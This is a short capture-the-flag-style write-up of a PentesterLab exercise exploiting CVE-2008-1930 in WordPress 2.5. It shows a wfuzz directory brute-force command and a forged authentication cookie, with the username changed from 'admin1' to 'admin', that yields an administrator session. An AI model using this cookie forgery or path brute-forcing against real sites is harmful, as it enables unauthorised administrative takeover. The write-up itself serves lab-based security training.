CVE-2008-1930 Wordpress 2.5 Cookie Integrity Protection Vulnerability

Wake up..Neo.. The Matrix HAS YOU —–the Matrix

From pentesterlab This course details the exploitation of an issue in the cookies integrity mechanism of Wordpress. This issue was found in 2008 and allowed an attacker to gain administrator access to a wordpress instance if user registration is enabled.

Difficluty: 2/5


  • Cookie Manager+
  • wfuzz

Waging War

Weaknesses and Strengths

Use wfuzz to burte force hidden path of the server

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

next step, we use admin1 and password pentesterlab to login as user admin1

here we can use Cookie Manager+ to view the cookies we got.

modify cookie from admin1%7C1461188835%7Ce6cf864114aa5acaae0795ff56b333b0 to admin%7C11461188835%7Ce6cf864114aa5acaae0795ff56b333b0, reload the page, now we are in admin’s session.